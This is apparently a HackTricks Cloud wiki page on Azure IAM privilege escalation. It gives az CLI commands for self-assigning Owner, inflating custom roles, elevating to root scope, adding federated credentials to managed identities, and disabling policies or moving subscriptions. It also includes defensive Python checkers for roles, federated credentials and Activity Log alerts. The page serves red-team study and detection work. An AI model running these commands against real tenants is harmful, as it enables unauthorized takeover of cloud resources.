Az - Azure IAM Privesc (Authorization)
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Azure IAM
For more information check:
Az - Entra ID (AzureAD) & Azure IAM
Permissions that allow a principal to modify authorization itself are usually privesc primitives. This is especially dangerous when they are granted at management group or subscription scope, because child resources inherit them.
Microsoft.Authorization/roleAssignments/write
This permission allows creating role assignments over a given scope, which lets an attacker escalate privileges by assigning a more privileged role to themselves or to another principal they control.
Typical flow:
```bash
# Login and confirm current context
az login
az account show
# Enumerate current assignments and find the custom role granting this action
az role assignment list --all --output table
az role definition list --name "<role-definition-name>"
```
If the compromised principal has this action over a scope, it can directly assign a privileged role such as Owner, Contributor, Key Vault Secrets Officer, or any other built-in/custom role available in that scope:
```bash
# Example
az role assignment create --role Owner --assignee "24efe8cf-c59e-45c2-a5c7-c7e552a07170" --scope "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.KeyVault/vaults/testing-1231234"
```
Knowing the object ID of the target user/service principal/managed identity is enough to assign a new role. This can be abused for self-privesc, lateral movement, or persistence by assigning the role to another controlled principal.
Microsoft.Authorization/roleDefinitions/write
This permission allows creating or modifying custom role definitions. In practice, this is dangerous because an attacker can:
- Modify a custom role that is already assigned to the compromised principal, so the new permissions become active immediately.
- Create a new over-privileged custom role and then assign it, usually chained with Microsoft.Authorization/roleAssignments/write.
Typical flow:
```bash
# Find the current assignments
az role assignment list --all --output table
# Review the role definition currently assigned to the compromised principal
az role definition list --name "<role-definition-name>"
```
Create a role.json file with the definition you want to apply, for example:
```json
{
  "roleName": "<name of the role>",
  "Name": "<name of the role>",
  "IsCustom": true,
  "Description": "Custom role with elevated privileges",
  "Actions": ["*"],
  "NotActions": [],
  "DataActions": ["*"],
  "NotDataActions": [],
  "AssignableScopes": ["/subscriptions/<subscription-id>"],
  "id": "/subscriptions/<subscription-id>/providers/Microsoft.Authorization/roleDefinitions/<role-id>"
}
```
Then update the role's permissions with the previous definition by calling:
```bash
az role definition update --role-definition role.json
```
If the modified role is already assigned to the attacker, this can be a faster path than creating a new role assignment, because the permission inflation applies to the existing assignment.
If the attacker only has roleDefinitions/write, they can still weaponize it by modifying roles that are already assigned to compromised principals.
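Added example for the two sections above (roleAssignments/write and roleDefinitions/write); it is not HackTricks' code. After listing role definitions with the commands above, this Python check applies Azure's Actions/NotActions matching (case-insensitive, `*` wildcards, NotActions subtracted) to decide which of the authorization-changing actions on this page a role definition effectively grants. The role definitions inside it are constructed placeholders; `AllStar` mirrors the page's role.json.

```python
# Added example (not HackTricks' code): decide whether a role definition
# effectively grants one of the authorization-changing actions covered on
# this page. Azure matches control-plane actions case-insensitively with '*'
# wildcards and subtracts NotActions from Actions; roles below are constructed.
import re

PRIVESC_ACTIONS = [
    "Microsoft.Authorization/roleAssignments/write",
    "Microsoft.Authorization/roleDefinitions/write",
    "Microsoft.Authorization/elevateAccess/action",
    "Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write",
    "Microsoft.Authorization/policyAssignments/write",
    "Microsoft.Authorization/policyAssignments/delete",
    "Microsoft.Authorization/policyDefinitions/write",
    "Microsoft.Management/managementGroups/write",
    "Microsoft.Management/managementGroups/subscriptions/write",
]


def action_matches(pattern: str, action: str) -> bool:
    """Azure-style match: '*' spans any characters (including '/')."""
    regex = "^" + ".*".join(re.escape(p) for p in pattern.split("*")) + "$"
    return re.match(regex, action, re.IGNORECASE) is not None


def role_grants(role_def: dict, action: str) -> bool:
    """True when some Actions entry matches and no NotActions entry does."""
    allowed = any(action_matches(p, action) for p in role_def.get("Actions", []))
    denied = any(action_matches(p, action) for p in role_def.get("NotActions", []))
    return allowed and not denied


def privesc_actions_of(role_def: dict) -> list:
    """The watched actions this role effectively grants, in PRIVESC_ACTIONS order."""
    return [a for a in PRIVESC_ACTIONS if role_grants(role_def, a)]


SAMPLE_ROLES = {  # constructed; 'AllStar' mirrors the page's role.json
    "AllStar": {"Actions": ["*"], "NotActions": []},
    "ReaderLike": {"Actions": ["*/read"], "NotActions": []},
    "AuthzMinusAssign": {
        "Actions": ["Microsoft.Authorization/*"],
        "NotActions": ["Microsoft.Authorization/roleAssignments/write"],
    },
}

if __name__ == "__main__":
    for name, role in SAMPLE_ROLES.items():
        print(f"{name}: {privesc_actions_of(role)}")
```

Feed it the `Actions`/`NotActions` of each role from `az role definition list` to spot roles that are privesc primitives even when their name looks harmless.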
Microsoft.Authorization/elevateAccess/action
This permission allows elevating privileges so that the caller can assign permissions to any principal over Azure resources. It is meant to be granted to Entra ID Global Administrators so they can also manage permissions over Azure resources.
Tip
I think the user needs to be a Global Administrator in Entra ID for the elevate call to work.
```bash
# Call elevate
az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01"
# Grant a user the Owner role at the root scope
az role assignment create --assignee "<object-id>" --role "Owner" --scope "/"
```
Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write
This permission allows creating/updating Federated Identity Credentials (FICs) on user-assigned managed identities. In practice, it lets an attacker add a new trust relationship to an external identity provider and then obtain tokens as that managed identity.
This is a persistence / identity hijacking primitive: if the managed identity already has access to Azure resources, the attacker only needs to create a matching external workload (for example, a GitHub Actions workflow) and exchange the external token for Azure tokens.
Useful things to check before abusing it:
- Which managed identity can be modified
- Which scope/roles are already assigned to that managed identity
- Which issuer, subject and audience will be accepted during the token exchange
You can create a FIC with the dedicated CLI command:
```bash
az identity federated-credential create \
  --name "github-federated-identity" \
  --identity-name testMI \
  --resource-group bialystok-rg \
  --issuer "https://token.actions.githubusercontent.com" \
  --subject "repo:REPO/IAMTEST:ref:refs/heads/main" \
  --audiences "api://AzureADTokenExchange"
```
Or with raw REST.
Example command granting a GitHub repo access to the managed identity:
```bash
# Generic example:
az rest --method PUT \
  --uri "https://management.azure.com//subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>/federatedIdentityCredentials/<name-new-federated-creds>?api-version=2023-01-31" \
  --headers "Content-Type=application/json" \
  --body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:<org-name>/<repo-name>:ref:refs/heads/<branch-name>","audiences":["api://AzureADTokenExchange"]}}'
# Example with specific data:
az rest --method PUT \
  --uri "https://management.azure.com//subscriptions/92913047-10a6-2376-82a4-6f04b2d03798/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/funcGithub-id-913c/federatedIdentityCredentials/CustomGH2?api-version=2023-01-31" \
  --headers "Content-Type=application/json" \
  --body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:carlospolop/azure_func4:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}}'
```
Once the FIC is created, the attacker can authenticate from the external workload and use the permissions already granted to the managed identity in Azure. For more information about abusing GitHub OIDC / workload identity, see:
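Added example, not from the page or any referenced project: a Python audit of the FICs attached to a managed identity that applies the three checks listed above (accepted issuer, audience, and a subject pinned to a specific org/repo and branch, tag or environment). The entries mirror the shape of `az identity federated-credential list` output but are constructed, and the allowlisted GitHub org is an assumed placeholder.

```python
# Added example (not HackTricks' code): audit the federated identity
# credentials (FICs) of a user-assigned managed identity. Entries mirror the
# shape of `az identity federated-credential list` output but are
# constructed; the allowlisted org is a placeholder assumption.
import re

ALLOWED_ISSUERS = {"https://token.actions.githubusercontent.com"}
ALLOWED_GITHUB_ORGS = {"contoso-org"}
EXPECTED_AUDIENCE = "api://AzureADTokenExchange"
# Pinned GitHub subject: repo:<org>/<repo>: followed by a branch, tag or environment
GITHUB_SUBJECT = re.compile(
    r"^repo:(?P<org>[^/:]+)/(?P<repo>[^/:]+):"
    r"(ref:refs/(heads|tags)/[^:]+|environment:[^:]+)$"
)


def fic_findings(fic: dict) -> list:
    """Names of the problems found in one FIC (empty list when clean)."""
    findings = []
    if fic.get("issuer") not in ALLOWED_ISSUERS:
        findings.append("unexpected-issuer")
    if fic.get("audiences") != [EXPECTED_AUDIENCE]:
        findings.append("unexpected-audience")
    m = GITHUB_SUBJECT.match(fic.get("subject", ""))
    if m is None:  # subject not pinned to a branch, tag or environment
        findings.append("unpinned-subject")
    elif m.group("org") not in ALLOWED_GITHUB_ORGS:
        findings.append("foreign-github-org")
    return findings


def audit(fics: list) -> dict:
    """FIC name -> findings, omitting clean entries."""
    return {f["name"]: r for f in fics if (r := fic_findings(f))}


SAMPLE_FICS = [  # constructed entries
    {"name": "ci-main", "issuer": "https://token.actions.githubusercontent.com",
     "subject": "repo:contoso-org/app:ref:refs/heads/main",
     "audiences": ["api://AzureADTokenExchange"]},
    {"name": "CustomGH2", "issuer": "https://token.actions.githubusercontent.com",
     "subject": "repo:unknown-org/azure_func4:ref:refs/heads/main",
     "audiences": ["api://AzureADTokenExchange"]},
    {"name": "pr-trust", "issuer": "https://token.actions.githubusercontent.com",
     "subject": "repo:contoso-org/app:pull_request",
     "audiences": ["api://AzureADTokenExchange"]},
    {"name": "odd-idp", "issuer": "https://idp.example.test", "subject": "svc",
     "audiences": ["api://other"]},
]
```

A FIC pointing at an org you do not own is exactly the trust relationship the section above describes, so `foreign-github-org` on an identity with Azure roles deserves immediate review.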
Microsoft.Authorization/policyAssignments/write | Microsoft.Authorization/policyAssignments/delete
An attacker with the Microsoft.Authorization/policyAssignments/write or Microsoft.Authorization/policyAssignments/delete permission over a management group, subscription or resource group can modify or delete Azure policy assignments, potentially disabling security restrictions that block certain operations.
This grants access to resources or functionality that were previously protected by the policy.
Delete a policy assignment:
```bash
az policy assignment delete \
  --name "<policyAssignmentName>" \
  --scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"
```
Disable a policy assignment:
```bash
az policy assignment update \
  --name "<policyAssignmentName>" \
  --scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>" \
  --enforcement-mode Disabled
```
Verify the changes:
```bash
# List policy assignments
az policy assignment list \
  --scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"
# Show specific policy assignment details
az policy assignment show \
  --name "<policyAssignmentName>" \
  --scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"
```
Microsoft.Authorization/policyDefinitions/write
An attacker with the Microsoft.Authorization/policyDefinitions/write permission can modify Azure policy definitions, changing the rules that enforce security restrictions across the environment.
For example, a policy that restricts the regions allowed for resource creation could be modified to allow any region, or the policy effect could be changed so that the policy becomes ineffective.
Modify a policy definition:
```bash
az policy definition update \
  --name "<policyDefinitionName>" \
  --rules @updated-policy-rules.json
```
Verify the changes:
```bash
az policy definition list --output table
az policy definition show --name "<policyDefinitionName>"
```
Microsoft.Management/managementGroups/write
An attacker with the Microsoft.Management/managementGroups/write permission can modify the management group hierarchy or create new management groups, potentially bypassing restrictive policies applied at higher levels.
For example, the attacker could create a new management group without restrictive policies and then move subscriptions into it.
Create a new management group:
```bash
az account management-group create \
  --name "yourMGname" \
  --display-name "yourMGDisplayName"
```
Modify the management group hierarchy:
```bash
az account management-group update \
  --name "<managementGroupId>" \
  --parent "/providers/Microsoft.Management/managementGroups/<parentGroupId>"
```
Verify the changes:
```bash
az account management-group list --output table
az account management-group show \
  --name "<managementGroupId>" \
  --expand
```
Microsoft.Management/managementGroups/subscriptions/write
An attacker with the Microsoft.Management/managementGroups/subscriptions/write permission can move subscriptions between management groups, potentially bypassing restrictive policies by moving a subscription into a group with less restrictive policies or none at all.
Move a subscription to another management group:
```bash
az account management-group subscription add \
  --name "<managementGroupName>" \
  --subscription "<subscriptionId>"
```
Verify the changes:
```bash
az account management-group subscription show \
  --name "<managementGroupId>" \
  --subscription "<subscriptionId>"
```
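Added example covering the elevateAccess, policy assignment/definition and management group sections above (not HackTricks' code): a Python classifier over Azure Activity Log records that flags the operations this page lists, treating a role assignment written at the root scope (the step that follows elevateAccess) and a policy assignment switched to DoNotEnforce as special cases. The records, callers and IDs are constructed placeholders in the shape of Activity Log JSON.

```python
# Added example (not HackTricks' code): flag authorization-changing operations
# in Azure Activity Log records. Records are constructed in the shape of the
# Activity Log JSON (operationName.value, status.value, caller, resourceId and,
# when present, properties.requestbody); watched operations are those this page covers.
WATCHED = {  # lower-cased operation -> base severity
    "microsoft.authorization/roleassignments/write": "high",
    "microsoft.authorization/roledefinitions/write": "high",
    "microsoft.authorization/elevateaccess/action": "critical",
    "microsoft.managedidentity/userassignedidentities/federatedidentitycredentials/write": "high",
    "microsoft.authorization/policyassignments/delete": "high",
    "microsoft.authorization/policyassignments/write": "medium",
    "microsoft.authorization/policydefinitions/write": "high",
    "microsoft.management/managementgroups/write": "medium",
    "microsoft.management/managementgroups/subscriptions/write": "high",
}
ROOT_RA = "/providers/Microsoft.Authorization/roleAssignments/"  # root-scope assignment IDs


def classify(record: dict):
    """(severity, reason) for a succeeded watched operation, else None."""
    op = record.get("operationName", {}).get("value", "").lower()
    sev, reason = WATCHED.get(op), op
    if sev is None or record.get("status", {}).get("value") != "Succeeded":
        return None
    body = record.get("properties", {}).get("requestbody", "").lower()
    if op.endswith("roleassignments/write") and record.get("resourceId", "").startswith(ROOT_RA):
        sev, reason = "critical", "role assignment at root scope"  # elevateAccess follow-up
    if op.endswith("policyassignments/write") and "donotenforce" in body:
        sev, reason = "high", "policy enforcement disabled"
    return sev, reason


def alerts(records: list) -> list:
    """[(caller, severity, reason)] for every record worth alerting on."""
    return [(r.get("caller"),) + c for r in records if (c := classify(r))]


SAMPLE = [  # constructed records; callers and IDs are placeholders
    {"operationName": {"value": "Microsoft.Authorization/elevateAccess/action"},
     "status": {"value": "Succeeded"}, "caller": "ga@contoso.example", "resourceId": "/"},
    {"operationName": {"value": "Microsoft.Authorization/roleAssignments/write"},
     "status": {"value": "Succeeded"}, "caller": "ga@contoso.example",
     "resourceId": ROOT_RA + "00000000-0000-0000-0000-000000000001"},
    {"operationName": {"value": "Microsoft.Authorization/policyAssignments/write"},
     "status": {"value": "Succeeded"}, "caller": "dev@contoso.example",
     "resourceId": "/providers/Microsoft.Management/managementGroups/mg1/providers/Microsoft.Authorization/policyAssignments/deny-regions",
     "properties": {"requestbody": '{"properties":{"enforcementMode":"DoNotEnforce"}}'}},
    {"operationName": {"value": "Microsoft.Authorization/roleAssignments/write"},
     "status": {"value": "Failed"}, "caller": "dev@contoso.example", "resourceId": ROOT_RA + "x"},
]
```

Failed attempts are skipped here on purpose; when hunting, drop the status check to also see who tried and was denied.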